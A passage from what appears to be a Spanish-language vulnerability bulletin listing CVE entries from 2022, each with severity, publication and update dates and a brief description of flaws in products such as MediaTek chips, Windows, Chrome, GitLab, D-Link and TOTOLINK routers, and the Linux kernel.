    En wlan, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS07310743; ID de incidencia: ALPS07310743
  • CVE-2022-26452
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    En isp, se presenta un posible uso de memoria previamente liberada debido a un bloqueo inapropiado. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS07262305; ID de Incidencia: ALPS07262305
  • CVE-2022-26473
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    En vdec fmt, se presenta un posible uso de memoria previamente liberada debido a un bloqueo inapropiado. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS07342197; ID de Incidencia: ALPS07342197
  • CVE-2022-42724
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/10/2022
    Fecha de última actualización: 08/08/2023
    El archivo app/Controller/UsersController.php en MISP versiones anteriores a 2.4.164, permite a atacantes detectar los nombres de los roles (esta es una información que sólo el administrador del sitio debería tener)
  • CVE-2022-42238
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Un problema de escalada vertical de privilegios en Merchandise Online Store versión v.1.0, permite a un atacante acceder al panel de control del administrador
  • CVE-2022-41518
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK NR1800X versión V9.1.0u.6279_B20210910, contiene una vulnerabilidad de inyección de comandos por medio de la función UploadFirmwareFile en el archivo /cgi-bin/cstecgi.cgi
  • CVE-2022-41525
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK NR1800X versión V9.1.0u.6279_B20210910, contiene una vulnerabilidad de inyección de comandos por medio de la función OpModeCfg en el archivo /cgi-bin/cstecgi.cgi
  • CVE-2022-32593
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    En vowe, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS07138493; ID de Incidencia: ALPS07138493
  • CVE-2022-32590
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    En wlan, se presenta un posible uso después de libre debido a una comprobación de estado incorrecta. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS07299425; ID de incidencia: ALPS07299425
  • CVE-2022-33645
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio de Windows TCP/IP Driver
  • CVE-2022-37968
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad de elevación de privilegios en el clúster Kubernetes habilitado por Azure Arc Connect.
  • CVE-2022-37970
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows DWM Core Library
  • CVE-2022-37971
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Microsoft Windows Defender
  • CVE-2022-37985
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Graphics Component
  • CVE-2022-34402
    Severidad: Pendiente de análisis
    Fecha de publicación: 10/10/2022
    Fecha de última actualización: 21/07/2023
    Dell Wyse ThinOS versión 2205, contiene una vulnerabilidad de Denegación de Servicio por Expresión Regular en la Interfaz de Usuario. Un atacante con privilegios de administrador podría explotar esta vulnerabilidad, conllevando a una denegación de servicio
  • CVE-2022-37976
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Active Directory Certificate Services
  • CVE-2022-37974
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows Mixed Reality Developer Tools
  • CVE-2022-42041
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    El paquete d8s-file-system para Python, distribuido en PyPI, incluía una potencial puerta trasera de ejecución de código insertada por un tercero. La puerta trasera es el paquete democritus-hashes. La versión afectada es 0.1.0
  • CVE-2022-42042
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    El paquete d8s-networking para Python, distribuido en PyPI, incluía una potencial puerta trasera de ejecución de código insertada por un tercero. La puerta trasera es el paquete democritus-hashes. La versión afectada es 0.1.0
  • CVE-2022-20394
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    En la función getInputMethodWindowVisibleHeight del archivo InputMethodManagerService.java, se presenta una posible forma de determinar cuando otra aplicación está mostrando un IME debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-204906124
  • CVE-2022-37979
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Hyper-V
  • CVE-2022-37981
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Windows Event Logging
  • CVE-2022-37982
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft WDAC OLE DB provider for SQL Server. Este ID de CVE es diferente de CVE-2022-38031
  • CVE-2022-28866
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un Control de Acceso Inapropiado múltiple en Nokia AirFrame BMC Web GUI versiones anteriores a R18 Firmware v4.13.00. No comprueba apropiadamente las peticiones de acceso a (o edición de) datos y funcionalidades en todos los endpoints bajo /#settings/* y /api/settings/*. Al no verificar los permisos de acceso a los recursos, permite a un potencial atacante visualizar páginas, con datos confidenciales, que no están permitidas, y modificar configuraciones del sistema causando también DoS, a las que sólo debería acceder el usuario con perfil de administración, omitiendo todos los controles (sin comprobar la identidad del usuario)
  • CVE-2022-41033
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en system service de eventos COM+ de Windows
  • CVE-2022-38388
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    La aplicación IBM Navigator Mobile Android 3.4.1.1 y 3.4.1.2, podría permitir a un usuario local obtener información confidencial debido a un control de acceso inapropiado. IBM X-Force ID: 233968
  • CVE-2022-42901
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/10/2022
    Fecha de última actualización: 08/08/2023
    Las aplicaciones de Bentley MicroStation y las basadas en MicroStation pueden verse afectadas por problemas de desbordamiento de pila y fuera de límites cuando abren archivos XMT diseñados. La explotación de estos problemas podría conllevar a una divulgación de información y una ejecución de código. Las versiones corregidas son 10.17.01.58* para MicroStation y 10.17.01.19* para Bentley View
  • CVE-2022-33749
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Es posible que un cliente no autenticado en la red cause que XAPI alcance su límite de descriptores de archivo. Esto causa que XAPI no pueda aceptar nuevas peticiones de otros clientes (confiables), y bloquea a XAPI de llevar a cabo cualquier tarea que requiera la apertura de descriptores de archivo
  • CVE-2022-35136
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/10/2022
    Fecha de última actualización: 08/08/2023
    Boodskap IoT Platform versión v4.4.9-02, permite a atacantes realizar peticiones de API no autenticadas
  • CVE-2022-39013
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 21/07/2023
    Bajo determinadas condiciones, un atacante autenticado puede obtener acceso a las credenciales del Sistema Operativo. Obtener acceso a las credenciales del Sistema Operativo permite al atacante modificar los datos del sistema y hacer que el sistema no esté disponible, conllevando a un alto impacto en la Confidencialidad y un bajo impacto en la Integridad y disponibilidad de la aplicación
  • CVE-2022-22528
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 14/08/2023
    La instalación de SAP Adaptive Server Enterprise (ASE) - versión 16.0, hace una entrada en la variable de entorno PATH del sistema en la plataforma Windows que, bajo determinadas condiciones, permite a un usuario estándar ejecutar binarios maliciosos de Windows que pueden conllevar a una escalada de privilegios en el sistema local. El problema es con el instalador de ASE y no afecta a otros binarios de ASE
  • CVE-2022-40871
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/10/2022
    Fecha de última actualización: 08/08/2023
    Dolibarr ERP & CRM versiones anteriores a 15.0.3 incluyéndola, es vulnerable a una inyección de Eval. Por defecto, cualquier administrador puede ser añadido a la página de instalación de dolibarr, y si es añadido con éxito, puede insertarse código malicioso en la base de datos y luego ejecutarlo por eval
  • CVE-2022-36774
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/10/2022
    Fecha de última actualización: 08/08/2023
    IBM Robotic Process Automation versiones 21.0.0, 21.0.1 y 21.0.2, es vulnerable a ataques de tipo man in the middle mediante la manipulación de la configuración del proxy del cliente. IBM X-Force ID: 233575
  • CVE-2022-41595
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/10/2022
    Fecha de última actualización: 08/08/2023
    Los teléfonos presentan vulnerabilidades de desbordamiento de heap, lectura fuera de límites y puntero nulo en fingerprint trusted application (TA). Una explotación con éxito de esta vulnerabilidad puede afectar al servicio de huellas digitales
  • CVE-2022-42159
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link COVR 1200,1202,1203 versión v1.08, tenía una semilla predecible en un generador de números pseudoaleatorios
  • CVE-2022-42717
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Hashicorp Packer versiones anteriores a 2.3.1. La configuración de sudoers recomendada para Vagrant en Linux es insegura. Si el host ha sido configurado de acuerdo con esta documentación, los usuarios no privilegiados en el host pueden aprovechar un comodín en la configuración de sudoers para ejecutar comandos arbitrarios como root
  • CVE-2022-24373
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 08/08/2023
    El paquete react-native-reanimated versiones anteriores a 3.0.0-rc.1, es vulnerable a una Denegación de Servicio por Expresión Regular (ReDoS) debido a un uso no apropiado de la expresión regular en el analizador del archivo Colors.js
  • CVE-2022-42221
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Netgear R6220 versión v1.1.0.114_1.0.1, sufre de un Control de Acceso Incorrecto, resultando en una vulnerabilidad de inyección de comandos
  • CVE-2022-3533
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 20/07/2023
    Se ha encontrado una vulnerabilidad en el Kernel de Linux. Ha sido calificada como problemática. Este problema afecta a la función parse_usdt_arg del archivo tools/lib/bpf/usdt.c del componente BPF. La manipulación del argumento reg_name conlleva a una pérdida de memoria. Es recomendado aplicar un parche para corregir este problema. El identificador asociado a esta vulnerabilidad es VDB-211031
  • CVE-2022-3060
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Un control inapropiado de un identificador de recurso en el seguimiento de errores en GitLab CE/EE, afectando a todas las versiones a partir de 12.7, permite que un atacante autenticado genere contenido que podría causar que una víctima realice peticiones arbitrarias no deseadas
  • CVE-2022-2908
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una potencial vulnerabilidad DoS en Gitlab CE/EE versiones a partir de 10.7 anteriores a 15.1.5, todas las versiones a partir de 15.2 anteriores a 15.2.3, todas las versiones a partir de 15.3 anteriores a 15.3.1, que permitía a un atacante desencadenar un alto uso de la CPU por medio de una entrada especialmente diseñada añadida en el campo de mensaje Commit
  • CVE-2022-3368
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en la funcionalidad Software Updater de Avira Security for Windows permitía a un atacante con acceso de escritura al sistema de archivos escalar sus privilegios en determinados escenarios. El problema ha sido corregido con Avira Security versión 1.1.72.30556
  • CVE-2022-2592
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Una falta de comprobación de la longitud en las descripciones de Snippet en GitLab CE/EE afectando a todas las versiones anteriores a 15.1.6, 15.2 anteriores a 15.2.4 y 15.3 anteriores a 15.3.2, permite a un atacante autenticado crear un Snippet maliciosamente grande que cuando son solicitados con o sin autenticación pone una carga excesiva en el servidor, lo que puede conllevar a una denegación de servicio
  • CVE-2022-3563
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 27/07/2023
    Se ha encontrado una vulnerabilidad clasificada como problemática en el Kernel de Linux. Está afectada la función read_50_controller_cap_complete del fichero tools/mgmt-tester.c del componente BlueZ. La manipulación del argumento cap_len conlleva a una desreferencia de puntero null. Es recomendado aplicar un parche para corregir este problema. VDB-211086 es el identificador asignado a esta vulnerabilidad
  • CVE-2022-3351
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab EE afectando a todas las versiones a partir de 13.7 anteriores a 15.2.5, a todas las versiones a partir de 15.3 anteriores a 15.3.4, a todas las versiones a partir de 15.4 anteriores a 15.4.1. El correo electrónico principal de un usuario puede ser divulgado a un atacante mediante los webhooks de eventos de miembros del grupo
  • CVE-2022-3330
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Era posible que un usuario invitado leyera una tarea dirigida a una nota inaccesible en Gitlab CE/EE, lo que afectaba a todas las versiones desde la 15.0 hasta la 15.2.5, la 15.3 hasta la 15.3.4 y la 15.4 hasta la 15.4.1
  • CVE-2022-3325
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 08/08/2023
    Control de acceso inapropiado en la API de GitLab CE/EE afectando a todas las versiones a partir de 12.8 anteriores a 15.2.5, a todas las versiones a partir de 15.3 anteriores a 15.3.4, a todas las versiones a partir de 15.4 anteriores a 15.4.1. Permitido editar las reglas de aprobación por medio de la API por un usuario no autorizado
  • CVE-2021-3305
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Beijing Feishu Technology Co., Ltd Feishu versión 3.40.3, contiene una vulnerabilidad de ruta de búsqueda no confiable
  • CVE-2022-43184
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link DIR878 versión 1.30B08 Hotfix_04, contiene una vulnerabilidad de inyección de comandos por medio del componente /bin/proc.cgi
  • CVE-2022-25664
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/10/2022
    Fecha de última actualización: 08/08/2023
    Una revelación de información debido a una exposición de información mientras la GPU lee los datos en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2022-25718
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/10/2022
    Fecha de última actualización: 08/08/2023
    Un problema criptográfico en WLAN debido a una comprobación incorrecta del valor de retorno mientras es realizado el intercambio de autenticación en Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
  • CVE-2022-37298
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/10/2022
    Fecha de última actualización: 08/08/2023
    Shinken Solutions Shinken Monitoring versión afectada 2.4.3, es vulnerable a un Control de Acceso Incorrecto. La clase SafeUnpickler que es encontrada en el archivo shinken/safepickle.py implementa un esquema de autenticación débil cuando son deserializados los objetos pasados desde los nodos de monitorización al servidor de monitorización de Shinken
  • CVE-2022-42197
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/10/2022
    Fecha de última actualización: 08/08/2023
    En Simple Exam Reviewer Management System versión v1.0, la función User List presenta un control de acceso inapropiado que permite a usuarios poco privilegiados modificar los permisos de los usuarios a privilegios más altos
  • Vulnerabilidad en SolarWinds Platform (CVE-2022-36966)
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/10/2022
    Fecha de última actualización: 03/08/2023
    Los usuarios con derechos de administración de nodos podían ver y editar todos los nodos debido a un control insuficiente del parámetro URL que causaba una vulnerabilidad de referencia directa a objetos insegura (IDOR) en SolarWinds Platform 2022.3 y anteriores
  • CVE-2022-25662
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/10/2022
    Fecha de última actualización: 08/08/2023
    Una divulgación de información debido a una desreferencia de puntero no confiable en el kernel en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2022-25661
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/10/2022
    Fecha de última actualización: 08/08/2023
    Una corrupción de la memoria debido a una desreferencia de puntero no confiable en el kernel en Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile
  • CVE-2022-3606
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/10/2022
    Fecha de última actualización: 20/07/2023
    Se ha encontrado una vulnerabilidad en el Kernel de Linux. Ha sido clasificada como problemática. Afecta a la función find_prog_by_sec_insn del archivo tools/lib/bpf/libbpf.c del componente BPF. La manipulación conlleva a una desreferencia de puntero null. Es recomendado aplicar un parche para corregir este problema. Ha sido asignado el identificador VDB-211749 a esta vulnerabilidad
  • CVE-2022-3637
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/10/2022
    Fecha de última actualización: 27/07/2023
    Se ha encontrado una vulnerabilidad en el Kernel de Linux y ha sido clasificada como problemática. Esta vulnerabilidad afecta a la función jlink_init del archivo monitor/jlink.c del componente BlueZ. La manipulación conlleva una denegación de servicio. Es recomendado aplicar un parche para corregir este problema. El identificador de esta vulnerabilidad es VDB-211936
  • CVE-2022-1070
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/10/2022
    Fecha de última actualización: 08/08/2023
    Aethon TUG Home Base Server versiones anteriores a 24, están afectadas por un atacante no autenticado que puede acceder libremente a las credenciales de usuario con hash
  • CVE-2022-41799
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de control de acceso inapropiado en GROWI versiones anteriores a 5.1.4 (serie v5) y versiones anteriores a v4.5.25 (serie v4), que permite a un atacante remoto autenticado omitir la restricción de acceso y descargar los datos de markdown de las páginas establecidas como privadas por los demás usuarios
  • CVE-2021-42010
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/10/2022
    Fecha de última actualización: 08/08/2023
    Heron versiones anteriores a 0.20.4-incubating incluyéndola, permiten una inyección de registros CRLF debido a una falta de escape en las declaraciones de registro. Por favor, actualice a versión 0.20.5-incubating que aborda este problema
  • CVE-2022-41796
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de la ruta de búsqueda no confiable en el instalador de Content Transfer (para Windows) Versiones 1.3 y anteriores, permite a un atacante conseguir privilegios por medio de una DLL troyana en un directorio no especificado
  • CVE-2022-41797
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/10/2022
    Fecha de última actualización: 08/08/2023
    Una autorización inapropiada en el manejador para la vulnerabilidad del esquema de URL personalizado en la aplicación Lemon8 para las versiones de Android anteriores a 3.3.5 y la aplicación Lemon8 para las versiones de iOS anteriores a 3.3.5, permite a un atacante remoto conllevar a un usuario a acceder a un sitio web arbitrario por medio de la aplicación vulnerable. Como resultado, el usuario puede ser víctima de un ataque de phishing
  • CVE-2021-46850
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/10/2022
    Fecha de última actualización: 08/08/2023
    myVesta Control Panel versiones anteriores a 0.9.8-26-43 y Vesta Control Panel versiones anteriores a 0.9.8-26, son vulnerables a una inyección de comandos. Un usuario administrativo autenticado y remoto puede ejecutar comandos arbitrarios por medio del parámetro v_sftp_license cuando envía peticiones HTTP POST al endpoint /edit/server
  • CVE-2022-27912
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Joomla! versiones 4.0.0 hasta 4.2.3. Los sitios con el modo de depuración habilitado públicamente exponían datos de peticiones anteriores
  • CVE-2022-20919
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 21/07/2023
    Una vulnerabilidad en el procesamiento de paquetes malformados del Protocolo Industrial Común (CIP) que se envían al software Cisco IOS y al software Cisco IOS XE podría permitir a un atacante remoto no autenticado causar una recarga no esperada del dispositivo afectado, lo que provocaría una condición de denegación de servicio (DoS). Esta vulnerabilidad es debido a que no es comprobado suficientemente la entrada durante el procesamiento de los paquetes CIP. Un atacante podría explotar esta vulnerabilidad mediante el envío de un paquete CIP malformado a un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar al dispositivo afectado recargarse inesperadamente, resultando en una condición de DoS
  • CVE-2022-2854
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Un uso de memoria previamente liberada en SwiftShader en Google Chrome versiones anteriores a 104.0.5112.101, permitía a un atacante remoto explotar potencialmente una corrupción de pila por medio de una página HTML diseñada.
  • CVE-2022-2857
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Un uso de memoria previamente liberada en Blink en Google Chrome versiones anteriores a 104.0.5112.101, permitía a un atacante remoto explotar potencialmente una corrupción de pila por medio de una página HTML diseñada.
  • CVE-2022-3049
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Un uso de memoria previamente liberada en SplitScreen en Google Chrome en Chrome OS, Lacros versiones anteriores a 105.0.5195.52, permitió a un atacante remoto que convenció a un usuario de participar en interacciones específicas de la Interfaz de Usuario específicos para explotar potencialmente una corrupción de la pila por medio de una página HTML diseñada.
  • CVE-2022-3044
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada en Site Isolation en Google Chrome versiones anteriores a 105.0.5195.52, permitía a un atacante remoto que hubiera comprometido el proceso de renderización omitir el aislamiento del sitio por medio de una página HTML diseñada.
  • CVE-2022-3045
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de entradas no confiables en V8 en Google Chrome versiones anteriores a 105.0.5195.52, permitía a un atacante remoto explotar potencialmente una corrupción de pila por medio de una página HTML diseñada.
  • CVE-2022-3047
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una aplicación insuficiente de políticas en Extensions API en Google Chrome versiones anteriores a 105.0.5195.52, permitía a un atacante que convenciera a un usuario de instalar una extensión maliciosa omitir la política de descargas por medio de una página HTML diseñada.
  • CVE-2022-3048
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada en Chrome OS lockscreen en Google Chrome en Chrome OS versiones anteriores a 105.0.5195.52, permitía a un atacante local omitir las restricciones de navegación de la pantalla de bloqueo por medio del acceso físico al dispositivo.
  • CVE-2022-2861
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de Extensions API en Google Chrome versiones anteriores a 104.0.5112.101, permitía a un atacante que convenciera a un usuario de instalar una extensión maliciosa inyectar scripts arbitrarios en la Interfaz de Usuario Web por medio de una página HTML manipulada.
  • CVE-2022-3040
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Un uso de memoria previamente liberada en Layout en Google Chrome versiones anteriores a 105.0.5195.52, permitía a un atacante remoto explotar potencialmente una corrupción de pila por medio de una página HTML diseñada.
  • CVE-2022-3042
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Un uso de memoria previamente liberada en PhoneHub en Google Chrome en Chrome OS versiones anteriores a 105.0.5195.52, permitía a un atacante remoto explotar potencialmente una corrupción de pila por medio de una página HTML diseñada.
  • CVE-2022-3056
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una aplicación insuficiente de políticas en Content Security Policy en Google Chrome versiones anteriores a 105.0.5195.52, permitía a un atacante remoto omitir la política de seguridad de contenidos por medio de una página HTML manipulada.
  • CVE-2022-3057
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de iframe Sandbox en Google Chrome versiones anteriores a 105.0.5195.52, permitía a un atacante remoto filtrar datos de origen cruzado por medio de una página HTML diseñada.
  • CVE-2022-3071
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Un uso de memoria previamente liberada en Tab Strip en Google Chrome en Chrome OS, Lacros versiones anteriores a 105.0.5195.52, permitía a un atacante remoto que convenciera a un usuario de participar en interacciones específicas de la Interfaz de Usuario explotar potencialmente una corrupción de la pila por medio de una interacción de interfaz de usuario diseñada.
  • CVE-2022-42999
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link DIR-816 A2 versión 1.10 B05, contiene múltiples vulnerabilidades de inyección de comandos por medio de los parámetros admuser y admpass en /goform/setSysAdm
  • CVE-2022-27925
    Severidad: MEDIA
    Fecha de publicación: 20/04/2022
    Fecha de última actualización: 08/08/2023
    Zimbra Collaboration (también se conoce como ZCS) versiones 8.8.15 y 9.0, presenta la funcionalidad mboximport que recibe un archivo ZIP y extrae archivos de él. Un usuario autenticado con derechos de administrador presenta la capacidad de cargar archivos arbitrarios en el sistema, conllevando a un salto de directorio
  • CVE-2022-33757
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/10/2022
    Fecha de última actualización: 08/08/2023
    Un atacante autenticado podría leer los archivos adjuntos de Nessus Debug Log desde la interfaz web sin tener los privilegios correctos para hacerlo. Esto puede conllevar a una divulgación de información sobre el objetivo del escaneo y/o el escaneo de Nessus a partes no autorizadas capaces de llegar a la instancia de Nessus
  • CVE-2022-35739
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/10/2022
    Fecha de última actualización: 08/08/2023
    PRTG Network Monitor versiones hasta 22.2.77.2204, no evita la entrada personalizada para el icono de un dispositivo, que puede ser modificado para insertar contenido arbitrario en la etiqueta de estilo para ese dispositivo. Cuando la página del dispositivo es cargada, los datos arbitrarios de las Hojas de Estilo en Cascada (CSS) son insertadas en la etiqueta de estilo, cargando contenido malicioso. Debido a que PRTG Network Monitor previene los "caracteres, y a que los navegadores modernos deshabilitan el soporte de JavaScript en las etiquetas de estilo, esta vulnerabilidad no pudo ser escalada a una vulnerabilidad de tipo Cross-Site Scripting
  • CVE-2022-40469
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OS v3.6.7 contiene una vulnerabilidad de ejecución remota de código (RCE) autenticada.
  • CVE-2022-41842
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Xpdf versión 4.04. Se presenta un fallo en la función gfseek(_IO_FILE*, long, int) en el archivo goo/gfile.cc
  • CVE-2022-41844
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en versión Xpdf versión 4.04. Se presenta un fallo en la función XRef::fetch(int, int, Object*, int) en el archivo xpdf/XRef.cc, una vulnerabilidad diferente a CVE-2018-16369 y CVE-2019-16088
  • CVE-2021-40167
    Severidad: MEDIA
    Fecha de publicación: 25/01/2022
    Fecha de última actualización: 08/08/2023
    Un archivo dwf o .pct malicioso, cuando se consume a través de la aplicación DesignReview.exe, podría conducir a una vulnerabilidad de corrupción de memoria por violación de acceso de lectura. Esta vulnerabilidad, junto con otras, podría conducir a la ejecución de código en el contexto del proceso actual
